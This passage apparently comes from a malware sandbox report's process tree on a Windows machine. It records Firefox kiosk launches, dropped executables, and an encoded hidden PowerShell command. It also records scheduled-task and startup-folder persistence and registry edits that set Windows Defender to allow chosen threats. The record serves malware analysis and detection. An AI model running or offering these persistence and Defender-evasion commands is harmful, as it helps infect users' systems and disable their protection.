                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                      6⤵
                                                      • Checks processor information in registry
                                                      • Modifies registry class
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:3564
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.0.529587111\981819529" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1184 -prefsLen 20847 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f9fac4fc-7584-432e-843d-4a3ae4b2ec31} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 1316 13df5e58 gpu
                                                        7⤵
                                                          PID:3784
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.1.759062617\1664407727" -parentBuildID 20221007134813 -prefsHandle 1464 -prefMapHandle 1460 -prefsLen 21708 -prefMapSize 233496 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7bbe644-338d-4cbe-8bc7-51cf8017960b} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 1476 104ec558 socket
                                                          7⤵
                                                            PID:3848
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.2.1732657575\906158520" -childID 1 -isForBrowser -prefsHandle 852 -prefMapHandle 2024 -prefsLen 21746 -prefMapSize 233496 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2279578-a082-470c-8e56-e947e9e9c45d} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 1976 1987c758 tab
                                                            7⤵
                                                              PID:1932
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.3.68603979\222571461" -childID 2 -isForBrowser -prefsHandle 2760 -prefMapHandle 2756 -prefsLen 26216 -prefMapSize 233496 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ad495844-a7e2-47fe-97cb-fb94ab2a044b} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 2772 1ebd3158 tab
                                                              7⤵
                                                                PID:1908
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.4.1320173722\1761808361" -childID 3 -isForBrowser -prefsHandle 3632 -prefMapHandle 3628 -prefsLen 26275 -prefMapSize 233496 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c90e8a2-f33e-41b5-a57e-b239a9259b0d} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 3644 20ccf158 tab
                                                                7⤵
                                                                  PID:3572
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.5.352568084\708945022" -childID 4 -isForBrowser -prefsHandle 3844 -prefMapHandle 3848 -prefsLen 26275 -prefMapSize 233496 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {32ec7f1a-691e-400d-8e6c-2784428e3b68} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 3832 20cce558 tab
                                                                  7⤵
                                                                    PID:3680
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3564.6.165078001\309569863" -childID 5 -isForBrowser -prefsHandle 3896 -prefMapHandle 3900 -prefsLen 26275 -prefMapSize 233496 -jsInitHandle 796 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {844a1723-ea45-41ae-b93d-1bf042e04ecc} 3564 "\\.\pipe\gecko-crash-server-pipe.3564" 3824 20f9c158 tab
                                                                    7⤵
                                                                      PID:3744
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                  5⤵
                                                                    PID:1952
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                      6⤵
                                                                        PID:1120
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                      5⤵
                                                                        PID:3884
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                          6⤵
                                                                          • Checks processor information in registry
                                                                          • Modifies registry class
                                                                          PID:3352
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.0.719623762\638231232" -parentBuildID 20221007134813 -prefsHandle 1192 -prefMapHandle 1184 -prefsLen 21373 -prefMapSize 233556 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2322e2e6-9fbc-485b-8c08-c84f5f69babd} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 1268 116f9c58 gpu
                                                                            7⤵
                                                                              PID:4060
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.1.1416341592\437735555" -parentBuildID 20221007134813 -prefsHandle 1468 -prefMapHandle 1464 -prefsLen 22234 -prefMapSize 233556 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03be95d9-3ece-4658-99a8-824ab169917b} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 1480 d71c58 socket
                                                                              7⤵
                                                                                PID:3720
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.2.1831142656\2030216326" -childID 1 -isForBrowser -prefsHandle 1920 -prefMapHandle 1828 -prefsLen 22337 -prefMapSize 233556 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4321d7a2-a155-4b1d-aa41-1e9b77192a41} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 1992 19e21658 tab
                                                                                7⤵
                                                                                  PID:4032
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.3.1792341188\156086993" -childID 2 -isForBrowser -prefsHandle 2308 -prefMapHandle 2384 -prefsLen 26685 -prefMapSize 233556 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {10ca5c62-69e7-44cc-b593-4dc4d13eba61} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 2420 1da7be58 tab
                                                                                  7⤵
                                                                                    PID:3264
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.4.1146985457\341835170" -childID 3 -isForBrowser -prefsHandle 3340 -prefMapHandle 3336 -prefsLen 26685 -prefMapSize 233556 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc8f6041-8b57-49bf-8b57-610686425beb} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 3352 20540758 tab
                                                                                    7⤵
                                                                                      PID:2416
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.5.1178449536\1554569085" -childID 4 -isForBrowser -prefsHandle 3548 -prefMapHandle 3552 -prefsLen 26685 -prefMapSize 233556 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {58a4995e-1750-4011-8238-0b8f2511f8cd} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 3532 20889258 tab
                                                                                      7⤵
                                                                                        PID:2652
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3352.6.1086388417\284005764" -childID 5 -isForBrowser -prefsHandle 3796 -prefMapHandle 3800 -prefsLen 26685 -prefMapSize 233556 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1bf4f80-3bdc-4ddc-8343-068541883f85} 3352 "\\.\pipe\gecko-crash-server-pipe.3352" 3780 2088c558 tab
                                                                                        7⤵
                                                                                          PID:1056
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                      5⤵
                                                                                        PID:1360
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                          6⤵
                                                                                            PID:3544
                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:3696
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                    2⤵
                                                                                      PID:1168
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                        3⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:2232
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
                                                                                      2⤵
                                                                                      • Drops startup file
                                                                                      PID:2196
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                      2⤵
                                                                                        PID:1540
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                          3⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:2664
                                                                                    • C:\Windows\system32\taskeng.exe
                                                                                      taskeng.exe {10A842EA-15C9-41EF-8A2E-AD467A2A1A00} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
                                                                                      1⤵
                                                                                        PID:3468
                                                                                        • C:\ProgramData\explorer.exe
                                                                                          C:\ProgramData\explorer.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:2920
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                          2⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Drops file in System32 directory
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3520
                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                            3⤵
                                                                                              PID:2488
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                            2⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Drops file in System32 directory
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2600
                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                              3⤵
                                                                                                PID:3544
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                              2⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              PID:2128
                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                3⤵
                                                                                                  PID:2516
                                                                                              • C:\ProgramData\explorer.exe
                                                                                                C:\ProgramData\explorer.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:3384
                                                                                              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:3372
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                2⤵
                                                                                                  PID:3832
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                    3⤵
                                                                                                    • Checks processor information in registry
                                                                                                    • Modifies registry class
                                                                                                    PID:3764
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.0.1433838594\408033595" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1204 -prefsLen 21557 -prefMapSize 233780 -appDir "C:\Program Files\Mozilla Firefox\browser" - {14bccc42-113c-4970-a0f1-498581935077} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 1276 13e83558 gpu
                                                                                                      4⤵
                                                                                                        PID:3572
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.1.742129587\217715378" -parentBuildID 20221007134813 -prefsHandle 1452 -prefMapHandle 1448 -prefsLen 21638 -prefMapSize 233780 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0b6b7fce-91f1-4c48-82dd-28afca131663} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 1464 101f1f58 socket
                                                                                                        4⤵
                                                                                                          PID:1928
                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.2.1620522240\1094266911" -childID 1 -isForBrowser -prefsHandle 1732 -prefMapHandle 1972 -prefsLen 21676 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {31189acb-4bcd-42ed-9d8c-4b8d1b9997fd} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 1948 1a11f858 tab
                                                                                                          4⤵
                                                                                                            PID:1492
                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.3.1367466615\1770339965" -childID 2 -isForBrowser -prefsHandle 2412 -prefMapHandle 2356 -prefsLen 26870 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f5ec7ab-bc8b-4951-8c29-4568fbdc67cf} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 2436 1c2f9358 tab
                                                                                                            4⤵
                                                                                                              PID:1592
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.4.1894984179\2130678914" -childID 3 -isForBrowser -prefsHandle 1756 -prefMapHandle 3168 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b8ac64e-532f-426d-8c86-4135cec1148d} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 1088 203adc58 tab
                                                                                                              4⤵
                                                                                                                PID:4020
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.5.1476871220\1943131024" -childID 4 -isForBrowser -prefsHandle 3212 -prefMapHandle 3156 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ec9c00f-2804-4c20-b3b2-03c78e2ea6ef} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 3240 1911d158 tab
                                                                                                                4⤵
                                                                                                                  PID:3996
                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.6.902322306\2089379629" -childID 5 -isForBrowser -prefsHandle 3908 -prefMapHandle 3904 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {904eb98b-1f54-40e9-afba-79b1ffff8f01} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 3920 235a4158 tab
                                                                                                                  4⤵
                                                                                                                    PID:1680
                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.7.718286514\531049192" -childID 6 -isForBrowser -prefsHandle 4036 -prefMapHandle 4040 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c9b5697-e648-45f7-9277-838283f1738a} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 4024 235a4a58 tab
                                                                                                                    4⤵
                                                                                                                      PID:3596
                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.8.1317850315\1159021742" -childID 7 -isForBrowser -prefsHandle 4212 -prefMapHandle 4220 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {312fccc2-e03d-425a-a2b5-fc58ff8fd69f} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 4200 235a6258 tab
                                                                                                                      4⤵
                                                                                                                        PID:2064
                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.9.1865846297\557052169" -childID 8 -isForBrowser -prefsHandle 3792 -prefMapHandle 3804 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {961b951e-7bd4-4373-8510-ad28ff1d5bd1} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 3640 1911d158 tab
                                                                                                                        4⤵
                                                                                                                          PID:3364
                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.10.2033647301\1426711647" -childID 9 -isForBrowser -prefsHandle 4008 -prefMapHandle 3944 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62cccd01-c9fc-4b54-a8e1-c70d84c2b17b} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 4004 2073ce58 tab
                                                                                                                          4⤵
                                                                                                                            PID:2460
                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3764.11.1435884242\1649117651" -childID 10 -isForBrowser -prefsHandle 4188 -prefMapHandle 3940 -prefsLen 26898 -prefMapSize 233780 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {69ac2e9b-c90b-4fb2-a82c-25fb7bb36a53} 3764 "\\.\pipe\gecko-crash-server-pipe.3764" 4468 2073e658 tab
                                                                                                                            4⤵
                                                                                                                              PID:3416
                                                                                                                        • C:\ProgramData\explorer.exe
                                                                                                                          C:\ProgramData\explorer.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:2572
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3320
                                                                                                                        • C:\ProgramData\explorer.exe
                                                                                                                          C:\ProgramData\explorer.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:2520
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:2424
                                                                                                                        • C:\ProgramData\explorer.exe
                                                                                                                          C:\ProgramData\explorer.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:3708
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3748
                                                                                                                        • C:\Windows\system32\wscript.EXE
                                                                                                                          C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js"
                                                                                                                          2⤵
                                                                                                                            PID:1980
                                                                                                                            • C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr
                                                                                                                              "C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr" "C:\Users\Admin\AppData\Local\QuantumDynamics Lab\W"
                                                                                                                              3⤵
                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2252
                                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                                          taskeng.exe {DD2A70BA-C0BF-4B58-866F-364380E076A4} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                          1⤵
                                                                                                                            PID:2484
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\fIQqLZn.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\fIQqLZn.exe PV /XkfcdidfUWc 385121 /S
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:348
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                3⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:1396
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                  4⤵
                                                                                                                                  • Indirect Command Execution
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2100
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                    5⤵
                                                                                                                                      PID:2152
                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                        6⤵
                                                                                                                                          PID:1768
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                      4⤵
                                                                                                                                      • Indirect Command Execution
                                                                                                                                      PID:1032
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                        5⤵
                                                                                                                                          PID:768
                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                            6⤵
                                                                                                                                              PID:2392
                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                          4⤵
                                                                                                                                          • Indirect Command Execution
                                                                                                                                          PID:3024
